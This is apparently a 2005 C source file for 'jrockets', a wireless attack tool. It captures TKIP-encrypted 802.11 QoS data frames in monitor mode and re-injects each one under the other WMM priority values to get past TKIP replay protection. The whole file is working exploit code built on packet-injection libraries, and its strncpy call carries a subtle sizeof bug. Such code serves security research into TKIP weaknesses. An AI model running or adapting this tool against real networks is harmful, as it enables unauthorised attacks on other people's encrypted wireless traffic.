/* Not for public distribution at this time.
   Copyright (c) 2005 Joshua Wright <jwright@hasborg.com>
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <stdint.h>
#include <netinet/in.h>
#include <signal.h>
#include <pcap.h>

#include <sys/socket.h>
#include <linux/wireless.h>

#include <tx80211.h>
#include <tx80211_packet.h>

#include "jrockets.h"

/* globals */
pcap_t *p = NULL;
struct tx80211 in_tx;


void lamont_hdump(unsigned char *bp, unsigned int length) {

	/* stolen from tcpdump, then kludged extensively */

	static const char asciify[] = "................................ !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~.................................................................................................................................";

	const unsigned short *sp;
	const unsigned char *ap;
	unsigned int i, j;
	int nshorts, nshorts2;
	int padding;

	printf("\n\t");
	padding = 0;
	sp = (unsigned short *)bp;
	ap = (unsigned char *)bp;
	nshorts = (unsigned int) length / sizeof(unsigned short);
	nshorts2 = (unsigned int) length / sizeof(unsigned short);
	i = 0;
	j = 0;
	while(1) {
		while (--nshorts >= 0) {
			printf(" %04x", ntohs(*sp));
			sp++;
			if ((++i % 8) == 0)
				break;
		}
		if (nshorts < 0) {
			if ((length & 1) && (((i-1) % 8) != 0)) {
				printf(" %02x  ", *(unsigned char *)sp);
				padding++;
			}
			nshorts = (8 - (nshorts2 - nshorts));
			while(--nshorts >= 0) {
				printf("     ");
			}
			if (!padding) printf("     ");
		}
		printf("  ");

		while (--nshorts2 >= 0) {
			printf("%c%c", asciify[*ap], asciify[*(ap+1)]);
			ap += 2;
			if ((++j % 8) == 0) {
				printf("\n\t");
				break;
			}
		}
		if (nshorts2 < 0) {
			if ((length & 1) && (((j-1) % 8) != 0)) {
				printf("%c", asciify[*ap]);
			}
			break;
		}
	}
	if ((length & 1) && (((i-1) % 8) == 0)) {
		printf(" %02x", *(unsigned char *)sp);
		printf("                                       %c",
	       		asciify[*ap]);
	}
	printf("\n");
}


void sighandler() {

	if (p != NULL) {
		pcap_close(p);
	}

	if (in_tx.raw_fd != 0) {
		tx80211_close(&in_tx);
	}

	exit(0);
}


void usage() {

	struct tx80211_cardlist *cardlist = NULL;
	int i;

	cardlist = tx80211_getcardlist();

	printf(
"jrockets 1.0 (c) 2005 Joshua Wright\n"
"Usage: jrockets [options]\n"
"  -i <interface>	specify the interface name\n"
"  -d <drivername>	string indicating driver used on interface\n");

	if (cardlist == NULL) {
		fprintf(stderr, "Error accessing supported cardlist.\n");
	} else {
		printf("\nSupported drivers are: ");
		for (i=1; i < cardlist->num_cards; i++) {
			printf("%s ", cardlist->cardnames[i]);
		}
		printf("\n");
	}
}

int wmmreplay(struct tx80211 *in_tx, uint8_t *packet, int plen, int offset) {

	struct wmmhdr *wmm;
	int priority;
	struct tx80211_packet in_packet;
	int i;

	wmm = (struct wmmhdr *)&packet[offset+QOSHDROFFSET];

	priority = wmm->priority;
	in_packet.packet = packet;
	in_packet.plen = plen;

	for (i=0; i < 4 ; i++) {
		if (priority != i) {
			wmm->priority=i;
			if (tx80211_txpacket(in_tx, &in_packet) < 0) {
				return(-1);
			}
		}
	}
	
	return(0);
}


int main(int argc, char *argv[]) {

	uint8_t *packet;
	struct pcap_pkthdr h;
	char errbuf[PCAP_ERRBUF_SIZE], iface[IFNAMSIZ];
	int c=0, datalink=0, offset;
	int drivertype=INJ_NODRIVER;

	struct tkiphdr *tk;
	struct dot11hdr *dot11;


	memset(&h, 0, sizeof(h));
	memset(&iface, 0, sizeof(iface));

	while((c = getopt(argc, argv, "i:d:")) != EOF) {
		switch(c) {
			case 'i':
			strncpy(iface, optarg, sizeof(iface-1));
			break;
			case 'd':
			drivertype = tx80211_resolvecard(optarg);
			break;
			default:
			usage();
			return -1;
		}
	}

	signal(SIGINT, sighandler);
	signal(SIGTERM, sighandler);
	signal(SIGQUIT, sighandler);

	if (drivertype == INJ_NODRIVER) {
		fprintf(stderr, "Driver name not recognized.\n");
		usage();
		return(-1);
	}

	if (tx80211_init(&in_tx, iface, drivertype) < 0) {
		perror("tx80211_init");
		return(-1);
	}

	if (tx80211_setmode(&in_tx, IW_MODE_MONITOR) != 0) {
		perror("tx80211_setmode");
		fprintf(stderr, "Error setting mode.\n");
		return(-1);
	}
	
	if (tx80211_open(&in_tx) != 0) {
		fprintf(stderr, "Unable to open interface %s.\n", iface);
		return(-1);
	}
	

	p = pcap_open_live(iface, SNAPLEN, PROMISC, TIMEOUT, errbuf);
	if (p == NULL) {
		perror("Unable to open interface");
		usage();
		return(-1);
	}

	datalink = pcap_datalink(p);
	switch(datalink) {
		case DLT_IEEE802_11:
		offset = 0;
		break;

		case DLT_PRISM_HEADER:
		offset = 144;
		break;

		default:
		fprintf(stderr, "Unrecognized datalink type %d.\n", datalink);
		usage();
		return(-1);
	}
	
	
    printf("Listening for packets ...\n");
	while (!(packet = (uint8_t *)pcap_next(p, &h)) == 0) {

		dot11 = (struct dot11hdr *)&packet[offset];

		/* Ensure packets are to the distribution system */
		if (dot11->u1.fc.to_ds != 1 || dot11->u1.fc.from_ds != 0) {
			continue;
		}

		/* Ensure the packet is a type/subtype QoS frame */
		if (dot11->u1.fc.type != DOT11_TYPE_DATA ||
		    dot11->u1.fc.subtype != DOT11_SUBTYPE_QOS) {
			continue;
		}
		
		tk = (struct tkiphdr *)&packet[offset+TKIPHDROFFSET];

		/* Ensure packet is TKIP encrypted by checking for extiv */
		if (tk->u1.iv.extiv == 1) {
			printf("Retransmitting packet:");
			lamont_hdump(packet, h.len);
			if (wmmreplay(&in_tx, packet, h.len, offset) != 0) {
				printf("Error retransmitting packets.\n");
				return(-1);
			} 
            break;
		}
	}

	pcap_close(p);
	tx80211_close(&in_tx);
	return(0);
}
